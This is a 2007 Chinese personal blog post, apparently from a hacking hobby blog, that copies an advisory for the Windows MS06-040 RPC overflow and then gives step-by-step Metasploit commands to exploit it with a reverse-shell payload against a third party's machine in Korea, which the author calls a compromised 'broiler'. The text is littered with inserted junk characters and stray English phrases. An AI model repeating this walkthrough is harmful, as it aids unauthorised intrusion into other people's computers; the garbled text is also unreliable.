幻想是那么的美丽...现实却如此残酷...

MS06040漏洞的利用

上一篇 / 下一篇  2007-03-14 12:39:21 / 个人分类:黑东西

MS06040漏洞的利用 爱好者博墅lN&[H-F!w(Z)E U}5A
爱好者博墅H l%IF+E El4F
Microsoft Windows Server服务远程缓冲区溢出漏洞 (MS06-040)
P1ci zo }+I;^0  
8GZ9Cjdz&O;z"o0发布Do not irrigate.Otherwise deletes ID...期:2006-08-08爱好者博墅E7K9}u8T K8c_eU
更新Do not irrigate.Otherwise deletes ID...期:2006-08-09爱好者博墅gF^u4[q:r3[ r~
  
/}2cnU"\~"z C*v!_0受影响系统:
(E5BW*d,uQ'B0Microsoft Windows XP SP2爱好者博墅&z9t+b!gr3a(bc
Microsoft Windows XP SP1
3F,Y$]m J+f{WJ0Microsoft Windows Server 2003 SP1
m9Mh_9t0Microsoft Windows Server 2003
d2p(j"B8?0E]1n[0Microsoft Windows 2000SP4
RxN$Q.m/h(q] j-v*T0BUGTRAQ ID: 19409爱好者博墅%i Ww+oIaHbFr
CVE(CAN) ID: CVE-2006-3439爱好者博墅VZ}?W#kf@:X
  m7UVV
5LGEvY/Bd0Microsoft Windows是微软发布的非常流行的Do not irrigate.Otherwise deletes ID...作系统。爱好者博墅/g/R4@5np~1P+U?
Microsoft Windows的Server服务在处理RPC通讯中的恶意消息时存在溢出漏洞,远程攻击者可以通过发送恶意的RPC报文来触发这个漏洞,导致执行任意代码.爱好者博墅0QJ3\UQ
  
G"Q y/} f0临时解决方法爱好者博墅-h7E2g2Ax2H
爱好者博墅R!e_,oc~
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
^2~ u9e Y u_0  爱好者博墅I@;isJyu
* 在防火墙阻断TCP 139和445端口。爱好者博墅m!@yzl:B
* 使用个人防火墙,如Windows XP和Windows Server 2003捆绑的Internet连接防火墙。
y O_ ZZ6?3r0* 在支持的系统上启用高级TCP/IP过滤功能。爱好者博墅#s vi3p o c
* 在受影响的系统上使用IPSec阻断受影响的端口。
k:@E sC$m0
U4tJ&b"HxQ0废话就不多说了,昨天朋友给了溢出工具,顺便测试了一下,成功率还真TMD的高.就拿一台韩国肉鸡做实验. 爱好者博墅 B7S6^hAC
 
aNQKs,xnQ0目标: 211.234.*.104
5w { h+@F:l+Y0 
'x'mjk G0工具: Metasploit V2.6爱好者博墅#JZ#^0J?|#]
Download: 爱好者博墅gPf0sWC J9Q h
http://www.metasploit.com/tools/framework-2.6.exe爱好者博墅 r2j kVH+g(k{
ActivePerl-5.8.7.815-MSWin32-x86-211909.msi 爱好者博墅1F C h%o5mg H%pFb
(Perl解释器,必须安装)爱好者博墅fs,QRU-_3Vyl#n
  爱好者博墅:h(Vu6B8s)`
下载下来先升级,运行安装目录下的 msfupdate.bat 文件 (要等蛮久,耐心点).
+h'J,i4U3L4M/]S\0  
:W,q K ed0?&Zrt e.~0这个工具详细Do not irrigate.Otherwise deletes ID...作我就不多说了,我只介绍与这个漏洞有关的命令(当然,其他漏洞利用Do not irrigate.Otherwise deletes ID...作大同小异).爱好者博墅$|VY'S*@4wlS,t
 
$zO1k;GZ9T0运行 msfconsole.bat , 这是控制台程序,升级完毕后界面如图1
Wc5Zh&fM0
http://wenping050.cnxhacker.net/UploadFiles/2006-8/816772305.jpg
爱好者博墅"hk3w g!L s9q-E
1.输入命令 show exploits //显示溢出利用程序,里面有153个溢出程序,可以根据你们自己的需要来使用.
j fmX|u0\3M1s02.输入命令 use netapi_ms06_040 //使用netapi_ms06_040 利用程序
(j^}Rt` O0
http://wenping050.cnxhacker.net/UploadFiles/2006-8/816907395.jpg

/dL!EL1r~/N03.输入命令 show payloads //显示可用的shellcode例表,这里我们主要用 win32_reverse 爱好者博墅._&w8` o;c
这个Shellcode
q|u.HEg_}a#o0 
ZZ(U ed V04.输入命令 set PAYLOAD win32_reverse //设置 PAYLOAD 为 爱好者博墅 bK9n5DwA{
win32_reverse爱好者博墅$CJR2s4JhM"?v0a
5.输入命令 set RHOST 211.234.*.104 //设置被攻击的主机的IP
:`%{7Fz7L)w z^0
U;fO1D[0hfj06.输入命令 set LHOST 125.71.2.104 //设置本机的IPD爱好者博墅}o m aU b$|7I

#n5Wt}CY D:N07.输入命令 set TARGET 0 //设置溢出类型 一般选0爱好者博墅6z*u#E.N6F)V)j?
8.输入命令 set //检查输入的信息爱好者博墅"K p;JIlM'}}6A,c Q.X'L
http://wenping050.cnxhacker.net/UploadFiles/2006-8/816373528.jpg
爱好者博墅]3d#[yc#_'oI
9.输入命令 exploit //开始溢出~爱好者博墅7UR} m"Zdk-G
爱好者博墅nd4F$P9nj,R B
http://wenping050.cnxhacker.net/UploadFiles/2006-8/816312225.jpg

7y,s+Xm WUG0这样就溢出成功了.

TAG: 黑东西

引用 删除 真心   /   2007-10-26 19:09:17
3
我很喜欢~我也很想学!但是我看不太明白`~我不笨!有没有人愿意教我几招!我愿当一个学徒~!有的话加我QQ了~~272021077   谢谢!!
 

评分:0

我来说两句

显示全部

:loveliness: :handshake :victory: :funk: :time: :kiss: :call: :hug: :lol :'( :Q :L ;P :$ :P :o :@ :D :( :)

Open Toolbar